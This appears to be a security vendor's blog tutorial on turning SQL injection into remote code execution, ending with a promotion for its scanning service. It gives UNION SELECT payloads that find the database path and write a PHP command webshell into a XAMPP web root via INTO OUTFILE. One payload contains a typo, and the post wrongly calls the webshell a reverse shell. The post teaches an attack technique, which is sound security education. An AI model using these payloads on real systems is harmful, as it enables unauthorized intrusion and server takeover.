How to preform SQLI TO RCE?

One of the most interesting and important things about any site is the database. So, it’s important to protect it from hacker attacks and in particular from the most common attack against databases – Sql Injection.


The reason this attack is so common is because in most cases a programmer sends a query to the database to get a particular answer, he also uses some of the query with user input. (Here comes the part of protection and input validation but we will save it for another time …)

Finding sqli in an investigation on a site is cool. But you can agree with me that finding rce is cooler.

And this is where a methodology that not many try to use comes into play – sqli to rce. (Yes it is possible)


One of the options in the sql language is to write to a file, which sounds naive at first… almost like any programming language, but then comes the interesting part, what if we write a shell file to the system ourselves and use it from the outside? Sounds fun – full reverse shell on the system (depending on permissions of course).

Now, lets drill down

The first thing we do is check where the sql is running on the server. This is done by injecting the command @@datadir into the sql query to get the full path of its location on the server.


Assuming we found a reflection in the second column we will enter the following payload –

'union select 1,@@datadir,3,4 --

And the output will look like this:

How to preform SQLI TO RCE?

According to the path we can infer that the server uses xampp and if we want to create a file and access it from the server we will need to create it in C:\xampp\htdocs

According to this information, it’s already possible to create the payload for the shell:

'union select 1,<php_payload>,3,4 into outfile <path> --

'union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --

And that’s it, we created a reverse shell within the system. Now left only to access it from outside (web). And this is done from the following link:


In my case it’s on the local server then:

With the following output:

1 The current time is: 16:22:25.20 Enter the new time: 3 4

Upload Webshell from sqli

And now you know How to preform SQLI TO RCE!

Want to check if your website vulnerable to “sqli to rce attack”?

Let Kayran do that for you!

Red Team

You’ve probably heard that there are teams in the Cyber field called Red Team and Blue Team. Let’s talk about the red one, shall we?

Read More »


In this article we will talk about APT vs. ATP. In other words, Advanced Persistent Threat and Advanced Threat Protection and the context between these

Read More »

Blue Team

We’ve talked about The Red Team before, but what about The Blue Team? How is this group different from the red one? Why would we

Read More »

Servers 101

Let’s have a “quick” Servers 101 Course. Courtesy of Kayran! If you’ve been on the internet for over an hour, you probably already heard of

Read More »